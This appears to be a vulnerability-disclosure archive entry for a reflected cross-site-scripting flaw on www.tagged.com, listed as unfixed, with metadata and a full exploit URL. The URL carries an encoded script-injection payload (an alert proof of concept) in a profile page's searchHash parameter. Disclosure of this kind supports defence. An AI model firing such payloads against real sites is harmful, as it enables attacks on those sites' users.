Security researcher nullbyt3, has submitted on 10/07/2010 a cross-site-scripting (XSS) vulnerability affecting www.tagged.com, which at the time of submission ranked 255 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 28/03/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 10/07/2010 |
Date published: 28/03/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: nullbyt3 |
Domain: www.tagged.com |
Category: XSS |
Pagerank: 255 |
URL: http://www.tagged.com/profile.html?view=mini&uid=1101376¶mStr=%26gender%3DB%26min_age%3D18%26max _age%3D-1%26country%3DUS%26distance%3D0%26location%3D%26location_nd%3D%26language%3D-1%26show%3D25%2 6rel_status%3D0%26interested_in%3D0%26sexual_orientation%3D0%26ethnicity%3D0%26religion%3D0&searchHa sh=_B_18_-1_US_0___undefined_-1_25_0_0_0_0_0_keyword__0_-1_-1_-1_0_1%22%3E%3Cscript%3Ealert(%27XSS%2 7)%3C/script%3E&isBrowse=1&userOffset=1 <- XSS in User Profiles. Theres only a script insertion available. |
Click here to view the mirror
|
|
|